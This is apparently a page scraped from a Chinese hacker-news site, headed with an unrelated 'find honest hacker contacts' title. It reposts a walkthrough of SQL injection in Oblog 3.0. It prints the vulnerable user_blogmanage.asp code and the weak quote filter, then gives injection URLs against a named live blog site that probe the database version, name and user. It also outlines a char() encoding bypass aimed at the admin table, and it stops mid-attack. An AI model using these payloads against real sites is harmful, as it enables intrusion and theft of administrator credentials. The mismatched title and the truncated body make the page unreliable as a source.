诚信黑客联系方式怎么找黑客联系方式

诚信黑客联系方式怎么找黑客联系方式

黑客平台hacker2020-11-01 8:00:004735A+A-

ps:郁闷纳,一个整形变量,为什么不做一强制转换呢! 看过第六轮黑防实验室的两位大侠对Oblog3.0 Access版本的渗透过程,敬佩之情犹如滔滔江水连绵不绝,又如黄河之水一发而不可收拾,尤其是他们把社会工程学原理利用得淋漓尽致,以及巧妙的后台上传shell的方法。佩服,佩服。说了这么多废话,我们进入正题,本人在通读Oblog3.0代码的时候发现user_blogmanage.asp文件存在安全隐患,看看下面移动blog日志的操作代码:sub moveblog()if id="" thenOblog.adderrstr("请指定要移动的日志")Oblog.showusererrexit subend ifdim subjectidsubjectid=trim(request("subject"))if subjectid="" thenOblog.adderrstr("请指定要移动的目标专题")Oblog.showusererrexit subelsesubjectid=Clng(subjectid)end ifif instr(id,",")>0 then‘如果id变量中含有逗号,去掉变量中的空格,执行下面的sql语句。设为第一条id=replace(id," ","")sql="Update [Oblog_log] set subjectid="&subjectid&" where logid in (" & id & ")"&wsql‘否则执行这个sql语句,设为第二条。elsesql="Update [Oblog_log] set subjectid="&subjectid&" where logid=" & id &wsqlend ifOblog.Execute sqldim blog,rs1set blog=new class_blogblog.userid=Oblog.logined_uidblog.update_allsubjectid()blog.update_index_subject 0,0,0,""set blog=nothingset rs=Oblog.execute("select subjectid from Oblog_subject where userid="&Oblog.logined_uid)while not rs.eofset rs1=Oblog.execute("select count(logid) from Oblog_log where Oblog_log.subjectid="&rs(0))Oblog.execute("update Oblog_subject set subjectlognum="&rs1(0)&" where Oblog_subject.subjectid="&rs(0))rs.movenextwendset rs=nothingset rs1=nothingOblog.showok "更新专题成功,需要重新发布首页,才可使专题统计准确!",""end sub再看看文件最上面对id变量的过滤:id=Oblog.filt_badstr(trim(Request("id"))),只用了这条语句,函数代码如下:public function filt_badstr(str)If Isnull(Str) Thenfilt_badstr = ""Exit Function End IfStr = Replace(Str,Chr(0),"")filt_badstr = Replace(Str,"'","''")end function只去掉了\0和单引号,呵呵,这怎能阻止我们的注入攻击呢,找个使用Oblog3.0 SQL版本的站点牛刀小试一下:构造环境测试语句:http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=@@version)--,一定要注意语句最后面的”’”,否则不会成功的。以上注入我们选择的是第一条语句,多了限制条件,就是不能使用空格且提交的语句中要含有逗号。我们可以使用来代替空格。由于限制条件多,以下测试中我们控制程序执行第二条语句。进一步环境刺探:0">http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_name()>0--0">http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_user>0--。嘿嘿,测试成功,由于注入语句中不能包含单引号,身经百战的我们当然很容易饶过这条限制,我喜欢使用SQL中的char函数饶过,正好手头有研究动易系统时写的char编码工具,先看看Oblog数据库的表结构,在Oblog_admin表中我们感兴趣的只有id,username

(责任编辑:网络)

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理